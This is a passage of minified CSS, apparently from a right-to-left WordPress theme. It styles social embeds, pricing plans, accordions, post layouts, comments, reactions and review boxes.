-webkit-object-fit: cover; object-position: 50% 50%; } .box-intro { line-height: 1; height: 0; -webkit-transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); } .box-intro:hover { opacity: .7; } .intro-inner { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: flex; align-items: center; flex-flow: column nowrap; justify-content: center; width: 100%; text-align: center; border: 1px solid var(--flex-gray-15); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .intro-content { font-size: var(--rem-mini); font-style: italic; line-height: 1.5; display: block; margin-top: 7px; padding: 0 10px; color: inherit; } .intro-inner i { font-size: 2.2rem; display: block; } .grid-el .box-content { position: absolute; z-index: 2; top: 0; right: 0; bottom: 0; left: 0; display: flex; display: -webkit-flex; align-items: center; justify-content: center; -webkit-transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); pointer-events: none; opacity: 0; color: #fff; } .instagram-box .box-content span { line-height: 1; z-index: 10; display: inline-flex; display: -webkit-inline-flex; align-items: center; padding: 0 5px; color: #fff; } .instagram-box .box-content i { font-size: 1.1rem; line-height: 1; margin-left: 3px; color: #fff; } .instagram-box:hover .box-content { opacity: 1; } .instagram-box .box-content:before { position: absolute; top: 0; right: 0; width: 100%; height: 100%; content: ''; background-color: rgba(0, 0, 0, .5); } .rb-twitter-wrap { padding: 20px; border: 1px solid var(--flex-gray-15); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .rb-twitter-wrap .rb-twitter-text { font-weight: 400; -webkit-transition: var(--effect); transition: var(--effect); color: var(--excerpt-color); } .rb-twitter-wrap a { -webkit-transition: var(--effect); transition: var(--effect); } .rb-twitter-wrap a:hover { color: var(--g-color); } .rb-twitter-wrap a:hover .rb-twitter-text { color: inherit; } .rb-twitter-wrap .rb-tweet-header .rb-twitter-h-info { position: relative; display: grid; margin-bottom: 20px; padding-bottom: 30px; border-bottom: 1px solid var(--flex-gray-15); grid-template-columns: 60px 1fr; grid-template-rows: 22px 22px; grid-column-gap: 5px; grid-row-gap: 1px; } .rb-twitter-wrap .rb-tweet-header { position: relative; } .rb-twitter-wrap .pk-twitter-counters.pk-color-secondary { position: relative; display: grid; grid-template-columns: auto 1fr; grid-gap: 10px; } .rb-twitter-wrap .tweet-avatar { height: 100%; text-align: center; grid-row: 1 / 3; } .rb-twitter-wrap .tweet-avatar img { -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: 50%; border-radius: 50%; } .rb-twitter-wrap .tweet-avatar:hover img { opacity: .9; } .rb-twitter-wrap .tweet-info.h6 { font-size: 1rem; } .rb-twitter-wrap .tweet-info.h6 span:nth-child(2) { text-transform: capitalize; } .rb-twitter-wrap .rb-quoted-author { display: grid; margin-bottom: 3px; grid-template-columns: auto 1fr; grid-gap: 1px; } .rb-twitter-wrap .rb-quoted-author img { -webkit-border-radius: 50%; border-radius: 50%; } .rb-twitter-wrap .rb-quoted-author em { font-weight: 400; font-style: italic; line-height: 24px; margin-right: 5px; margin-bottom: 5px; color: var(--meta-fcolor); } .rb-twitter-wrap .rb-quoted-author { display: grid; grid-template-columns: auto 1fr; grid-gap: 1px; } .rb-quoted-author img { -webkit-border-radius: 50%; border-radius: 50%; } .rb-twitter-wrap .rb-tweet-entry { font-size: var(--excerpt-fsize); color: var(--meta-fcolor); } .rb-twitter-wrap .rb-tweet-entry a { font-family: var(--h6-family); text-decoration: underline; } .rb-twitter-wrap .rb-twitter-summary:not(:last-child) { margin-bottom: 20px; } .rb-twitter-wrap .rb-tweet-actions svg { width: 10px; height: 10px; } .rb-twitter-wrap .rb-tweet-actions a { font-size: .7rem; display: flex; align-items: center; justify-content: center; min-width: 50px; padding: 3px 6px; border: 1px solid var(--flex-gray-15); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .rb-twitter-wrap .rb-tweet-actions a:not(:last-child) { margin-left: 10px; } .rb-twitter-wrap .rb-tweet-actions .rb-action-count { margin-right: 3px; } .rb-twitter-wrap .rb-tweet-actions { display: flex; align-items: stretch; margin-top: 14px; } .about-content-wrap .about-bio.is-centered { margin-right: auto; margin-left: auto; text-align: center; } .about-content-wrap .social-icon-wrap { display: flex; display: -webkit-flex; flex-flow: row wrap; } .about-bio.is-centered + .social-icon-wrap { justify-content: center; } .about-content-wrap .social-icon-wrap a { margin-left: 15px; -webkit-transition: var(--effect); transition: var(--effect); } .about-content-wrap .social-icon-wrap a:hover { -webkit-transform: scale(1.2); transform: scale(1.2); } .about-content-wrap .about-bio.is-centered + .social-icon-wrap a { margin-left: 0; padding-right: 7px; padding-left: 7px; } .about-content-wrap .about-bio > * { margin-bottom: .5rem; } .about-content-wrap .about-bio > img { margin-bottom: 1.5rem; } .about-content-wrap .about-bio > a img { margin-bottom: 1rem; } .about-content-wrap .about-bio { max-width: 370px; } .about-content-wrap .about-bio p { font-size: var(--rem-mini); line-height: 1.7; max-width: 370px; color: var(--excerpt-color); } .about-content-wrap > *:not(:last-child) { margin-bottom: 15px; } .about-content-wrap .about-bio.is-centered p { margin-right: auto; margin-left: auto; } .grid-holder.rb-c2 { display: grid; grid-template-columns: auto auto; grid-gap: 10px; } .grid-holder.rb-c3 { display: grid; grid-template-columns: auto auto auto; grid-gap: 10px; } .grid-holder.rb-c4 { display: grid; grid-template-columns: auto auto auto auto; grid-gap: 5px; } .grid-el img { height: 100%; } .grid-footer { font-size: .8rem; display: block; margin-top: 10px; text-align: left; } .grid-header span, .grid-header em { font-size: .9rem; } .grid-header a, .grid-footer a { -webkit-transition: opacity .3s cubic-bezier(0.32, 0.74, 0.57, 1); transition: opacity .3s cubic-bezier(0.32, 0.74, 0.57, 1); opacity: .7; } .grid-header a:hover, .grid-footer a:hover { opacity: 1; } .address-info { font-size: var(--rem-small); } .address-info svg { max-width: 16px; height: auto; margin-left: 10px; fill: var(--g-color); } .address-info h5 { margin-bottom: 15px; } .address-info .phone, .address-info .tel, .address-info .email { display: flex; align-items: center; margin-bottom: 10px; } .office-address { display: flex; align-items: flex-start; margin-bottom: 25px; } .office-address svg { padding-top: 5px; } .additional-title { margin-top: 25px; } .address-info > *:last-child { margin-bottom: 0; } .address-info a:hover { color: var(--g-color); } .newsletter-fw.has-bg { padding-top: 40px; padding-bottom: 40px; text-align: center; background-repeat: no-repeat; background-position: center center; background-size: cover; } .w-banner { position: relative; display: block; overflow: hidden; padding: 110px 30px; text-align: center; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .w-banner-content { position: relative; z-index: 9; display: flex; display: -webkit-flex; align-items: center; flex-grow: 1; justify-content: center; min-height: 240px; } .w-banner-desc.element-desc { font-size: var(--rem-small); max-width: 100%; margin-top: 20px; margin-right: auto; margin-left: auto; } .banner-bg, .w-banner .banner-bg img { position: absolute; top: 0; right: 0; width: 100%; height: 100%; object-position: top center; } .banner-btn { display: inline-block; margin-top: 20px; text-align: center; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } /** plan box */ .plan-inner { position: relative; display: block; padding: 40px 20px; border-radius: var(--round-5); } .is-box-shadow .plan-inner { border-radius: var(--round-5); background-color: var(--plan-box-color, transparent); box-shadow: 0 5px 30px var(--shadow-7); } .is-box-border .plan-inner { border: 1px solid var(--plan-box-color, var(--flex-gray-15)); } .is-box-bg .plan-inner { background-color: var(--plan-box-color, var(--flex-gray-7)); } .plan-inner > *:not(:last-child) { margin-bottom: 30px; } .plan-header > *:not(:last-child) { margin-bottom: 15px; } .plan-features { font-size: var(--rem-small); display: flex; flex-flow: column nowrap; } .plan-feature:not(:last-child) { display: inline-flex; margin-bottom: 7px; } .plan-feature:before { font-family: 'ruby-icon' !important; display: inline-flex; margin-left: 5px; content: '\e960'; color: #42c337; } .plan-description { font-size: var(--rem-small); } [data-theme='dark'] .plan-feature:before, .light-scheme .plan-feature:before { color: var(--absolute-white); } .plan-price-wrap { font-size: 1.2rem; line-height: 1; display: flex; align-items: center; flex-flow: row nowrap; } .plan-tenure { color: var(--meta-fcolor); } .plan-price { font-size: 3rem; padding: 0 2px; } .plan-price-unit { margin-top: -.5em; } .plan-button-wrap button, .plan-button-wrap a.button, .plan-button-wrap .stripe-button-el { width: 100%; padding-top: 7px; padding-bottom: 7px; background: var(--plan-button-bg, var(--g-color)); background-image: none; box-shadow: none; } .plan-button-wrap a.button { font-size: var(--rem-small); display: inline-block; text-align: center; } .plan-button-wrap button span, .plan-button-wrap .stripe-button-el span { font-family: inherit !important; font-size: var(--plan-button-size, var(--rem-small)); font-style: inherit !important; color: var(--plan-button-color, inherit); background: none !important; background-image: none !important; -webkit-box-shadow: none; box-shadow: none !important; -webkit-text-shadow: none; text-shadow: none !important; } .plan-button-wrap button:hover, .plan-button-wrap .button:hover, .plan-button-wrap .stripe-button-el:not(:disabled):active, .plan-button-wrap .stripe-button-el.active { background: var(--plan-button-bg, var(--g-color)); -webkit-box-shadow: 0 4px 15px var(--plan-button-bg-opacity, var(--g-color-90)); box-shadow: 0 4px 15px var(--plan-button-bg-opacity, var(--g-color-90)); } /** accordion */ .rb-accordion .elementor-accordion { border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .rb-accordion .elementor-accordion .elementor-accordion-title { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); font-style: var(--h4-fstyle); line-height: var(--h4-fheight, 1.45); letter-spacing: var(--h4-fspace); text-transform: var(--h4-transform); color: inherit !important; } .rb-accordion .elementor-accordion-icon { width: 15px !important; color: inherit !important; } .rb-accordion .elementor-accordion-icon i { font-size: 10px; } .rb-accordion .elementor-tab-content { font-family: var(--body-family); font-size: var(--body-fsize); font-weight: var(--body-fweight); font-style: var(--body-fstyle); line-height: 1.7; letter-spacing: var(--body-fspace); text-transform: var(--body-transform); color: var(--body-fcolor); } .rb-accordion .elementor-accordion .elementor-accordion-item { border: none; border-bottom: 1px solid var(--flex-gray-15); } .rb-accordion .elementor-accordion { border-radius: var(--round-5); } .rb-accordion .elementor-accordion .elementor-tab-content { border-color: var(--flex-gray-15); } .rb-accordion .elementor-accordion .elementor-tab-title { -webkit-transition: var(--effect); transition: var(--effect); opacity: .3; } .rb-accordion .elementor-accordion-item:hover .elementor-tab-title, .rb-accordion .elementor-accordion .elementor-tab-title.elementor-active { opacity: 1; } /* ----------------- 9 - Single ----------------- */ .single-post-outer:not(:last-child) { margin-bottom: 20px; border-bottom: 1px solid var(--flex-gray-15); } .single-infinite-point .rb-loader { margin-bottom: 25px; } .single-post-outer.has-continue-reading .s-ct { overflow: hidden; height: 700px; max-height: 700px; } .single-post-outer.has-continue-reading .single-sidebar { position: relative; } .single-post-outer.has-continue-reading .sidebar-inner { position: absolute; z-index: 1; right: 0; left: 0; } .single-post-outer.has-continue-reading { overflow: hidden; } .continue-reading { position: relative; z-index: 100; display: flex; justify-content: center; padding: 30px 0 40px 0; background-color: var(--solid-white); } .continue-reading:before, .restrict-box:before { position: absolute; right: 0; bottom: 99%; left: 0; display: block; width: 100%; height: 150px; content: ''; background-image: linear-gradient(to top, var(--solid-white) 0, transparent 100%); } .continue-reading-btn.is-btn { font-size: var(--rem-small); display: inline-flex; } .grid-container { position: relative; display: flex; flex-flow: row wrap; flex-basis: 100%; margin-right: -30px; margin-left: -30px; } .grid-container > * { flex: 0 0 100%; width: 100%; padding-right: 30px; padding-left: 30px; } .single-meta { display: flex; align-items: center; flex-flow: row nowrap; justify-content: space-between; width: 100%; } .smeta-in { display: flex; align-items: center; flex-flow: row nowrap; justify-content: flex-start; } .smeta-in > .meta-avatar { margin-left: 12px; } .smeta-in > .meta-avatar img { width: 60px; height: auto; border-radius: 100%; } .single-meta .p-meta, .overlay-text .single-meta .p-meta { margin-bottom: 3px; } .share-action i { text-shadow: -3px 3px 0 #ffffff10, -2px 2px 0 #00000020; } [data-theme='dark'] .l-shared-sec .share-action i, .light-scheme .l-shared-sec .share-action i, [data-theme='dark'] .t-shared-sec .share-action i, .light-scheme .t-shared-sec .share-action i, [data-theme='dark'] .sticky-share-list .share-action i, .light-scheme .sticky-share-list .share-action i { text-shadow: none; } .share-action.is-mobile.icon-whatsapp { display: flex; display: -webkit-flex; } .share-action.is-web.icon-whatsapp { display: none; } .smeta-extra { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; } .share-action, .footer-social-list a { -webkit-transition: var(--effect); transition: var(--effect); } .t-shared-sec { display: flex; align-items: center; } .sticky-share-list > * { display: flex; flex-flow: row nowrap; } .t-shared-sec > *:not(.t-shared-header) { display: flex; flex-flow: row wrap; } .sticky-share-list .share-action, .t-shared-sec .share-action { font-size: 16px; display: inline-flex; padding-right: 6px; padding-left: 6px; } .single-time-read { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; white-space: nowrap; } .single-time-read:before { display: inline-flex; height: 8px; margin-right: 6px; margin-left: 10px; content: ''; opacity: .5; border-right: 1px solid var(--flex-gray-40); } .single-header { position: relative; z-index: 109; display: block; } .s-cats, .s-breadcrumb { margin-bottom: 15px; } .s-title, .s-tagline, .single-meta { margin-bottom: 15px; } .s-feat-outer { margin-bottom: 30px; } .feat-caption { position: relative; margin-top: 10px; } .attribution { display: block; margin-top: 4px; padding-right: 65px; } .feat-caption .caption-text:before { position: relative; display: inline-flex; width: 50px; height: 1px; margin-left: 12px; padding-top: .75em; content: ''; vertical-align: top; border-bottom: 1px solid var(--g-color); } .caption-text { position: relative; display: block; } .s-feat img, .s-feat-holder img { display: block; width: 100%; object-fit: cover; } .s-feat-holder img { width: 100%; height: 100%; } .ubox:not(:first-child) { margin-top: 25px; padding-top: 25px; border-top: 1px solid var(--flex-gray-15); } .ubox-header { display: flex; align-items: center; flex-flow: row nowrap; width: 100%; } .author-info-wrap { display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; } .author-avatar { width: 50px; height: auto; margin-left: 12px; } .author-avatar img { border-radius: 100%; } .author-info { display: flex; flex-flow: column nowrap; justify-content: center; } .usocials { display: flex; align-items: center; flex-flow: row nowrap; } .usocials > * { line-height: 1; } .usocials a { font-size: 13px; padding: 0 5px; -webkit-transition: var(--effect); transition: var(--effect); } .usocials a:hover { -webkit-transform: scale(1.2); transform: scale(1.2); } .author-job { line-height: 1; display: flex; margin-top: 5px; white-space: nowrap; } .ubox .ubio { display: block; margin-top: 20px; margin-bottom: 0; } .co-author .meta-author-label { display: none; } .meta-author-label.meta-label { margin-left: 0; } .ef-label { margin-left: 5px; color: var(--meta-fcolor) } .efoot { position: relative; clear: both; padding-top: calc(2rem + 2px); } .efoot:before { position: absolute; top: 0; right: 0; width: 50px; height: 3px; content: ''; border-radius: var(--round-7); background-color: currentColor; } .efoot > * { margin-top: 12px; } .efoot > *:first-child { margin-top: 0; } .efoot-bar { display: flex; align-items: center; width: 100%; } .blabel { display: inline-flex; align-items: center; margin-left: 10px; } .blabel i { line-height: 1; margin-left: 7px; } .blabel i.rbi-via { font-size: 1.25em; } .reaction-sec { position: relative; display: block; padding-top: 25px; } .reaction-wrap { display: flex; align-items: center; flex-flow: row wrap; justify-content: space-evenly; } .reaction { position: relative; display: flex; flex: 0 0 80px; flex-flow: row wrap; justify-content: center; max-width: 80px; padding: 5px 10px; cursor: pointer; } .reaction-heading { display: block; margin-bottom: 20px; text-align: center; } .reaction-content { width: 100%; } .reaction .reaction-icon { display: flex; justify-content: center; width: 100%; height: auto; margin: auto; -webkit-transition: transform .25s var(--timing); transition: transform .25s var(--timing); -webkit-transform: scale(1) rotate(0deg); transform: scale(1) rotate(0deg); will-change: transform; } .reaction-icon svg { width: 50px; height: 50px; } .reaction .reaction-title { font-size: var(--rem-small); line-height: 1; display: flex; justify-content: center; width: 100%; margin-top: 10px; -webkit-transition: color .25s var(--timing); transition: color .25s var(--timing); white-space: nowrap; } .reaction-count { font-weight: bold; line-height: 1; display: flex; align-items: center; justify-content: center; width: 100%; height: 1.25em; margin-top: 7px; white-space: nowrap; border-radius: var(--round-3); background-color: var(--flex-gray-7); } .reaction:hover .reaction-icon { -moz-transform: scale(1.2) rotate(20deg); -ms-transform: scale(1.2) rotate(20deg); -o-transform: scale(1.2) rotate(20deg); -webkit-transform: scale(1.2) rotate(20deg); transform: scale(1.2) rotate(20deg); } .reaction:hover .reaction-title { color: var(--g-color); } .reaction.active .reaction-count { color: var(--absolute-white); background-color: var(--g-color); } .reaction:before { font-family: 'ruby-icon'; font-size: 18px; line-height: 18px; position: absolute; top: 6px; right: auto; bottom: auto; left: 6px; content: '\e942'; -webkit-transition: opacity .25s; transition: opacity .25s; pointer-events: none; opacity: 0; color: var(--g-color); } .reaction.loading:before { z-index: 10; width: auto; height: 18px; content: '\e942'; -webkit-transform-origin: center; transform-origin: center; -webkit-animation: reaction-spinner 1s linear infinite; animation: reaction-spinner 1s linear infinite; letter-spacing: 0; opacity: 1; will-change: transform; } .reaction.loading .reaction-icon { opacity: .5; } @keyframes reaction-spinner { to { transform: rotate(-360deg); -webkit-transform: rotate(-360deg); } } .e-shared-sec { display: flex; align-items: center; flex-flow: row nowrap; } .e-shared-header i { margin-left: .35em } .rbbsl { font-size: 18px; display: flex; flex-flow: row wrap; flex-shrink: 0; margin-right: auto; } .rbbsl > * { line-height: var(--height-40); display: inline-flex; margin-left: 10px; padding: 0 20px; border-radius: var(--round-3); background-color: var(--flex-gray-7); } .rbbsl a > span { margin-right: 7px; } .rbbsl a:not(:nth-child(1)) > span { display: none; } .rbbsl a:not(:nth-child(1)) { justify-content: center; padding: 0 12px; } .entry-sec { position: relative; padding-top: 37px; padding-bottom: 35px; } .entry-newsletter { position: relative; padding-top: 37px; } .entry-newsletter .newsletter-box-content { max-width: 600px; } .entry-sec:before, .entry-newsletter:before, .review-footer > *:not(.review-action):before { position: absolute; z-index: 1; top: 0; right: 0; left: 0; overflow: hidden; height: 3px; content: ''; background-image: linear-gradient(to left, var(--flex-gray-20) 20%, transparent 21%, transparent 100%); background-image: -webkit-linear-gradient(left, var(--flex-gray-20) 20%, transparent 21%, transparent 100%); background-repeat: repeat-x; background-position: 100% 0; background-size: 5px; } .mobile-collapse-sections:before { position: absolute; z-index: 1; top: 0; right: 0; left: 0; overflow: hidden; height: 3px; content: ''; background-image: linear-gradient(to left, var(--submbnav-color-10, var(--subnav-color-10)) 20%, transparent 21%, transparent 100%); background-image: -webkit-linear-gradient(left, var(--submbnav-color-10, var(--subnav-color-10)) 20%, transparent 21%, transparent 100%); background-repeat: repeat-x; background-position: 100% 0; background-size: 5px; } .e-shared-sec.entry-sec { padding-top: 18px; padding-bottom: 15px; } .e-shared-header { display: flex; align-items: center; flex-flow: row nowrap; } .reading-indicator { position: fixed; z-index: 9999; top: 0; right: 0; left: 0; display: block; overflow: hidden; width: 100%; height: var(--indicator-height); } #reading-progress { display: block; width: 0; max-width: 100%; height: 100%; -webkit-transition: width .1s ease; transition: width .1s ease; border-top-left-radius: 5px; border-bottom-left-radius: 5px; background: var(--g-color); background: linear-gradient(-90deg, var(--indicator-bg-from) 0%, var(--indicator-bg-to) 100%); background: -webkit-linear-gradient(left, var(--indicator-bg-from), var(--indicator-bg-to)); } .comment-form-comment label, .comment-form-author label, .comment-form-email label, .comment-form-url label, .no-comment .comment-reply-title { display: none; } .newsletter-box-header { display: flex; align-items: center; margin-bottom: 25px; } .newsletter-icon { line-height: 0; flex-shrink: 0; margin-left: 25px; } .newsletter-icon svg { width: 60px; } .newsletter-box-title { margin-bottom: 10px; } .mc4wp-form-fields > * { display: flex; align-items: stretch; flex-flow: row nowrap; margin-top: 10px; } .mc4wp-form-fields > *:first-child { margin-top: 0; } .agree-to-terms { font-size: var(--rem-mini); width: 100%; color: var(--meta-fcolor); } .agree-to-terms input { margin: 4px 0 0 6px; } .mc4wp-form-fields input[type='email'] { flex-grow: 1; width: 100%; } .mc4wp-form-fields input:not(:first-child) { margin-right: 7px; } .newsletter-box-policy { font-size: var(--rem-mini); margin-top: 15px; color: var(--meta-fcolor); } .newsletter-box-policy a { transition: var(--effect); text-decoration: underline dotted; color: var(--body-fcolor); --webkit-transition: var(--effect); } .newsletter-box-policy a:hover { color: var(--g-color); } .newsletter-box-content input:not([type='submit']) { font-weight: bold; } .comments-area { display: block; } .comments-area .comment-meta a { text-decoration: none; } .comments-area #respond > #commentform { margin-top: 15px; } .comment-metadata .review-stars { font-size: 18px; letter-spacing: 1px; color: var(--body-fcolor); } .comment-awaiting-moderation { font-size: var(--rem-mini); display: inline-flex; width: 100%; margin-bottom: 7px; color: #d1a220; } .comment-awaiting-moderation:before { font-family: 'ruby-icon'; font-style: normal; display: inline-flex; margin-left: 4px; content: '\e949'; } .comment-form { position: relative; display: block; margin-right: -10px; margin-left: -10px; } .comment-form input[type='text'], .comment-form input[type='email'], .comment-form input[type='url'] { width: 100%; } .comment-form > * { margin-bottom: 20px; padding-right: 10px; padding-left: 10px; } .comment-form-cookies-consent { display: flex; display: -webkit-flex; align-items: center; flex-flow: row nowrap; flex-basis: 100%; width: 100%; } .comment-form-cookies-consent label { font-size: var(--rem-mini); padding-right: 5px; cursor: pointer; } .comment-notes .required { color: #ff4545; } .logged-in-as { font-size: var(--rem-mini); } .logged-in-as a:last-child { text-decoration: underline dotted; opacity: 0.5; } .logged-in-as a { -webkit-transition: var(--effect); transition: var(--effect); } .logged-in-as a:hover { text-decoration: underline; } .logged-in-as a:last-child:hover { opacity: 1; color: var(--g-color); } .comment-form > p.form-submit { display: block; margin-top: 20px; margin-bottom: 0; } .comment-form .comment-notes { font-size: var(--rem-mini); margin-bottom: 15px; } .comment-notes #email-notes { font-style: italic; } .comment-reply-title { line-height: 1; margin-bottom: 10px; } .comment-form-comment label, .comment-form-author label, .comment-form-email label, .comment-form-url label, .no-comment .comment-reply-title { display: none; } .comment-box-header { position: relative; display: block; } a.show-post-comment { line-height: var(--height-40); position: absolute; top: 0; left: 0; display: flex; align-items: center; padding: var(--padding-40); -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--round-7); background-color: var(--flex-gray-7); } a.page404-btn { line-height: var(--height-40); display: inline-block; color: inherit; border-radius: var(--round-7); background-color: var(--flex-gray-7); } a.show-post-comment:hover, a.page404-btn:hover { color: var(--absolute-white); background-color: var(--g-color); -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } .comment-box-header > * { display: flex; display: -webkit-flex; align-items: center; } .comment-box-header i, .comment-box-header svg { margin-left: 10px; } .comment-box-header svg { width: 1em; } .comment-box-title i, .comment-box-title svg { border-bottom: 3px dotted var(--g-color); } .box-comment-btn { line-height: 42px; position: relative; display: flex; display: -webkit-flex; margin-right: auto; padding: 0 60px; -webkit-transition: var(--effect); transition: var(--effect); } .rb-form-rating { display: flex; display: -webkit-flex; align-items: center; width: 100%; } .rb-review-stars { font-size: 24px; position: relative; } .rb-review-stars span { line-height: 0; display: flex; display: -webkit-flex; align-items: center; flex-flow: row nowrap; flex-grow: 0; width: 0; margin-right: 10px; padding: 0; letter-spacing: 0; } .rb-review-stars span a { line-height: 1; display: flex; display: -webkit-flex; flex-grow: 0; padding: 2px; } .rb-form-rating label { font-size: var(--rem-mini); line-height: 1; padding-right: 7px; border-right: 4px solid var(--g-color); } .rb-review-stars span:hover i:before, .rb-form-rating.selected a i:before, .rb-form-rating.selected .rb-review-stars span:hover a i:before { content: '\e951'; } .rb-review-stars span > a.active ~ a i:before, .rb-review-stars span > a:hover ~ a i:before, .rb-form-rating.selected .rb-review-stars span > a:hover ~ a i:before { content: '\e94f'; } .rb-review-stars i { -webkit-transition: var(--effect); transition: var(--effect); } .comment-title h3 { margin-bottom: 30px; } .comment-title i { display: inline; margin-left: 5px; } .comment-author { font-size: var(--rem-small); margin-bottom: 7px; } .comment-author .avatar { position: absolute; top: 3px; right: -65px; display: block; width: 50px; height: 50px; -webkit-border-radius: 50%; border-radius: 50%; object-fit: cover; } .comment-author .says { display: none; } .comment-list { position: relative; display: block; margin-top: 35px; margin-bottom: 25px; border-bottom: 1px dashed var(--flex-gray-15); } .comment-body { position: relative; display: block; width: auto; max-width: 100%; margin-right: 65px; margin-bottom: 25px; } .comment-list li.parent > .comment-body { margin-bottom: 20px; } .comment-metadata { font-family: var(--meta-family); font-size: var(--meta-fsize); line-height: 1; display: flex; align-items: center; flex-flow: row wrap; color: var(--meta-fcolor); } .comment-metadata > * { margin-bottom: 7px; } .comment-metadata * { font-family: inherit; font-size: inherit; font-weight: inherit !important; line-height: inherit; } .comment-content { font-size: var(--excerpt-fsize); position: relative; display: block; margin-top: 10px; } .comment-content p, .comment-content li { font-size: inherit; } a.comment-reply-link { line-height: 24px; position: absolute; z-index: 99; top: 0; left: 0; display: block; padding: 0 12px; -webkit-transition: var(--effect); transition: var(--effect); letter-spacing: var(--btn-fspace); border: 1px solid rgba(0, 0, 0, .05); border-radius: var(--round-3); } a.comment-reply-link:hover { color: #fff; background-color: var(--g-color); } .comments-area .comment-meta a.comment-edit-link { margin-right: 10px; } .comments-area .comment-meta > a:first-child { margin-right: 0; } .comments-area .comment-meta a.comment-edit-link:hover { text-decoration: underline dotted; } a.comment-reply-link:before { font-family: 'ruby-icon'; font-size: .9em; margin-left: 5px; content: '\e902'; } .comment-list .logged-in-as a { font-weight: inherit; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none; } .logged-in-as a:hover, .comment-list .logged-in-as a:hover { text-decoration: underline; } .comment-list .comment-reply-title small a { font-size: var(--rem-mini); margin-right: 7px; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; text-transform: none; color: var(--g-color); } .comment-list .comment-reply-title small a:hover { text-decoration: underline dotted; } .comment-list .comment-respond { margin-right: 65px; margin-bottom: 35px; } .comment-list ul.children { margin-right: 30px; } .e-pagi { position: relative; display: block; margin-right: -7px; margin-left: -7px; } .e-pagi .inner { display: flex; display: -webkit-flex; align-items: stretch; flex-flow: row nowrap; flex-grow: 1; } .e-pagi .nav-el { display: flex; display: -webkit-flex; flex: 0 0 50%; width: 50%; padding-right: 7px; padding-left: 7px; } .e-pagi a { display: flex; display: -webkit-flex; flex: 1; flex-flow: column nowrap; } .e-pagi .rbi-angle-left { padding-left: 5px; } .e-pagi .rbi-angle-right { padding-right: 5px; } .e-pagi .nav-label { margin-bottom: 12px; letter-spacing: .1em; text-transform: uppercase; } .e-pagi .nav-right { margin-right: auto; } .e-pagi .nav-right .nav-label { margin-right: auto; } .e-pagi .nav-inner { display: flex; display: -webkit-flex; align-items: center; } .e-pagi i { letter-spacing: 0; } .e-pagi img { display: flex; flex-shrink: 0; width: 50px; height: 50px; margin-left: 12px; border-radius: 50%; } .e-pagi .nav-right .nav-inner { flex-direction: row-reverse; text-align: left; } .e-pagi .nav-right img { margin-right: 12px; margin-left: 0; } .review-section { position: relative; display: block; overflow: hidden; border-radius: var(--round-7); box-shadow: 0 5px 30px var(--shadow-7); } .review-intro { position: relative; display: flex; overflow: hidden; flex-flow: row nowrap; } .review-section .review-intro { background-color: var(--dark-accent); } .review-feat { flex-shrink: 0; width: 100px; } .review-intro .review-feat img { width: 100%; height: 100%; object-fit: cover; } .review-bg { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; } .review-section .review-bg img { width: 100%; height: 100%; opacity: .5; object-fit: cover; } .review-intro .inner { position: relative; display: flex; align-items: center; flex-grow: 1; padding: 30px 20px; } .review-heading { display: flex; align-items: flex-start; flex-flow: column nowrap; } .review-intro .meta-info { display: flex; align-items: flex-end; flex-flow: column nowrap; justify-content: flex-end; margin-right: auto; } .review-intro .average { display: flex; align-items: flex-start; flex-flow: row nowrap; } .review-intro .meta-description { margin-left: 7px; } .review-heading > *:not(:last-child), .review-section .meta-info > *:not(:last-child) { margin-bottom: 10px; } .review-section .rline-wrap, .review-section .rstar-wrap { margin-left: 0; } .review-header .rstar:before { background-color: var(--absolute-dark); } .review-intro .rstar-wrap { margin-left: 0; } .review-section .review-intro .average, .review-section .review-heading { text-shadow: 0 0 5px rgba(0, 0, 0, .15); } .review-content { padding: 25px 30px; } .review-el { display: flex; align-items: center; } .review-el:not(:last-child) { margin-bottom: 15px; } .review-rating { margin-right: auto; } .review-label { display: flex; flex-flow: column; } .rating-info { margin-top: 3px; margin-right: 13px; } .review-label .h5 { line-height: 1; padding-right: 10px; border-right: 3px solid var(--review-color); } .review-footer { position: relative; display: block; margin: 0 30px; } .review-footer > *:not(.review-action) { position: relative; padding: 28px 0 25px 0; } .pros-cons-holder { margin-right: -20px; margin-left: -20px; } .pros-cons .inner { display: flex; flex-flow: row wrap; width: 100%; } .pros-cons .inner > * { display: flex; flex: 0 0 50%; justify-content: center; width: 50%; padding: 0 20px; } .pros-cons-list-inner { display: inline-block; } .pros-cons-list-inner > * { display: block; margin-top: 7px; } .pros-cons-title { display: flex; align-items: center; flex-flow: row nowrap; margin-top: 0; padding-bottom: 5px; } .pros-cons-title svg { width: var(--em-mini); margin-left: 7px; } .pros-cons-el i { font-size: 9px; display: inline-block; margin-left: 7px; vertical-align: middle; color: #426d48; } .pros-cons-el i.rbi-minus { font-size: 11px; color: #cd3048; } .review-summary-title { display: block; margin-bottom: 15px; } .summary-content, .pros-cons-el { font-size: var(--rem-mini); } .user-rating, .rating-header { line-height: 0; display: flex; align-items: center; flex-flow: row nowrap; } .average-info { margin-right: auto; } .user-rating svg { width: 1.35em; margin-left: 5px; } .total-vote { margin-right: 5px; } .review-action { display: flex; padding-bottom: 25px; } .review-btn { display: inline-flex; align-items: center; } .review-btn i { font-size: 1.25em; margin-left: 5px; } .sfoter-sec { position: relative; margin-bottom: 40px; } .sfoter-sec .block-h { margin-bottom: 20px; } .single-related { padding-top: 30px; } .single-related:before { position: absolute; z-index: -1; top: 0; right: 50%; bottom: 0; width: 100vw; max-width: 